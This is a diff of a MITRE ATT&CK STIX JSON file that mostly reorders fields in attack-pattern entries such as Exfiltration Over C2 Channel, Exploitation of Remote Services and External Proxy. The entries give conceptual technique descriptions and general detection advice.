+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ",
"x_mitre_data_sources": [
"Network protocol analysis",
"Netflow/Enclave netflow",
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) ",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9639,23 +10047,33 @@
],
"modified": "2020-03-28T00:34:55.439Z",
"created": "2020-03-09T17:07:57.392Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
"x_mitre_data_sources": [
"Process monitoring",
"User interface"
],
- "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:41.804Z",
+ "modified": "2020-03-12T15:59:47.470Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "exfiltration"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Exfiltration Over C2 Channel",
+ "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -9668,19 +10086,9 @@
"source_name": "University of Birmingham C2"
}
],
- "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
- "name": "Exfiltration Over C2 Channel",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "exfiltration"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-12T15:59:47.470Z",
- "created": "2017-05-31T21:30:41.804Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -9721,22 +10129,22 @@
],
"modified": "2020-03-28T00:35:24.570Z",
"created": "2017-05-31T21:30:25.159Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "User interface",
- "Process monitoring"
- ],
- "x_mitre_contributors": [
- "Itzik Kotler, SafeBreach"
- ],
- "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
- "x_mitre_network_requirements": true,
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.\n\nMonitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.",
+ "x_mitre_contributors": [
+ "Itzik Kotler, SafeBreach"
+ ],
+ "x_mitre_data_sources": [
+ "User interface",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549",
@@ -9762,23 +10170,23 @@
],
"modified": "2020-03-28T00:31:48.713Z",
"created": "2017-05-31T21:30:46.461Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Data loss prevention",
- "File monitoring"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_system_requirements": [
+ "Presence of physical medium or device"
],
- "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
- "x_mitre_network_requirements": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_system_requirements": [
- "Presence of physical medium or device"
+ "x_mitre_network_requirements": false,
+ "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Data loss prevention",
+ "File monitoring"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -9809,11 +10217,10 @@
],
"modified": "2020-03-28T00:43:24.228Z",
"created": "2020-03-15T15:30:42.378Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ",
"x_mitre_data_sources": [
"Malware reverse engineering",
"Network protocol analysis",
@@ -9821,10 +10228,11 @@
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9855,21 +10263,21 @@
],
"modified": "2020-03-28T00:50:31.361Z",
"created": "2020-03-15T15:37:47.583Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ",
"x_mitre_data_sources": [
"Network protocol analysis",
"Netflow/Enclave netflow",
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9895,11 +10303,10 @@
],
"modified": "2020-03-28T01:02:24.276Z",
"created": "2020-03-09T12:51:45.570Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
@@ -9908,10 +10315,11 @@
"Network protocol analysis",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -9937,24 +10345,40 @@
],
"modified": "2020-03-28T00:31:02.204Z",
"created": "2020-03-11T13:50:11.467Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Presence of physical medium or device"
],
+ "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
"x_mitre_data_sources": [
"Process monitoring",
"Data loss prevention",
"File monitoring"
],
- "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.",
- "x_mitre_system_requirements": [
- "Presence of physical medium or device"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-03-09T15:04:32.767Z",
+ "modified": "2020-03-28T01:02:24.172Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "exfiltration"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b",
+ "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
+ "name": "Exfiltration to Cloud Storage",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -9962,22 +10386,6 @@
"url": "https://attack.mitre.org/techniques/T1567/002"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Exfiltration to Cloud Storage",
- "description": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.\n\nExamples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. ",
- "id": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "exfiltration"
- }
- ],
- "modified": "2020-03-28T01:02:24.172Z",
- "created": "2020-03-09T15:04:32.767Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -10020,11 +10428,10 @@
],
"modified": "2020-03-28T00:58:55.433Z",
"created": "2020-03-09T14:51:11.772Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
@@ -10033,10 +10440,11 @@
"Network protocol analysis",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.",
- "x_mitre_network_requirements": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -10087,15 +10495,11 @@
],
"modified": "2020-02-18T16:10:38.866Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS",
- "AWS",
- "GCP",
- "Azure"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian"
],
- "x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+ "x_mitre_version": "2.1",
"x_mitre_data_sources": [
"Azure activity logs",
"AWS CloudTrail logs",
@@ -10105,11 +10509,15 @@
"Web application firewall logs",
"Application logs"
],
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS",
+ "AWS",
+ "GCP",
+ "Azure"
+ ]
},
{
"object_marking_refs": [
@@ -10135,23 +10543,23 @@
],
"modified": "2020-03-28T19:06:02.690Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_remote_support": true,
- "x_mitre_system_requirements": [
- "Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise."
- ],
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
- "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+ "x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Anti-virus",
"System calls",
"Process monitoring"
],
- "x_mitre_version": "1.1"
+ "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_system_requirements": [
+ "Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise."
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
@@ -10187,25 +10595,25 @@
],
"modified": "2020-03-25T18:51:01.070Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "John Lambert, Microsoft Threat Intelligence Center"
- ],
- "x_mitre_data_sources": [
- "Authentication logs",
- "Windows Error Reporting",
- "Process monitoring"
- ],
- "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.",
- "x_mitre_permissions_required": [
- "User"
- ],
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.",
+ "x_mitre_data_sources": [
+ "Authentication logs",
+ "Windows Error Reporting",
+ "Process monitoring"
+ ],
+ "x_mitre_contributors": [
+ "John Lambert, Microsoft Threat Intelligence Center"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b",
@@ -10231,35 +10639,43 @@
],
"modified": "2020-03-29T20:00:46.900Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "John Lambert, Microsoft Threat Intelligence Center"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "System access controls"
],
"x_mitre_data_sources": [
"Windows Error Reporting",
"Process monitoring",
"File monitoring"
],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "System access controls"
+ "x_mitre_contributors": [
+ "John Lambert, Microsoft Threat Intelligence Center"
],
- "x_mitre_detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
- "id": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Exploitation for Privilege Escalation",
- "description": "Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.",
+ "created": "2017-05-31T21:30:55.066Z",
+ "modified": "2020-03-26T21:12:49.194Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -10267,18 +10683,10 @@
"external_id": "T1068"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-26T21:12:49.194Z",
- "created": "2017-05-31T21:30:55.066Z",
+ "description": "Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.",
+ "name": "Exploitation for Privilege Escalation",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839",
"x_mitre_version": "1.2",
"x_mitre_data_sources": [
"Windows Error Reporting",
@@ -10300,10 +10708,18 @@
"x_mitre_is_subtechnique": false
},
{
- "id": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Exploitation of Remote Services",
- "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.",
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-02-04T20:14:11.064Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "lateral-movement"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -10331,18 +10747,10 @@
"source_name": "NVD CVE-2014-7169"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "lateral-movement"
- }
- ],
- "modified": "2020-02-04T20:14:11.064Z",
- "created": "2018-04-18T17:59:24.739Z",
+ "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.",
+ "name": "Exploitation of Remote Services",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82",
"x_mitre_version": "1.1",
"x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
"x_mitre_data_sources": [
@@ -10405,8 +10813,19 @@
"phase_name": "impact"
}
],
- "modified": "2020-03-28T22:35:27.602Z",
+ "modified": "2020-04-22T15:19:31.380Z",
"created": "2020-02-20T14:34:08.496Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+ "x_mitre_data_sources": [
+ "Web logs",
+ "Web application firewall logs",
+ "Packet capture"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -10414,20 +10833,25 @@
"AWS",
"GCP",
"Azure"
- ],
- "x_mitre_data_sources": [
- "Web logs",
- "Web application firewall logs",
- "Packet capture"
- ],
- "x_mitre_detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
- "x_mitre_impact_type": [
- "Integrity"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
+ "created": "2020-03-14T23:12:18.466Z",
+ "modified": "2020-03-27T17:50:37.411Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
+ "name": "External Proxy",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -10445,22 +10869,6 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "External Proxy",
- "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.",
- "id": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-27T17:50:37.411Z",
- "created": "2020-03-14T23:12:18.466Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -10513,24 +10921,25 @@
"phase_name": "initial-access"
}
],
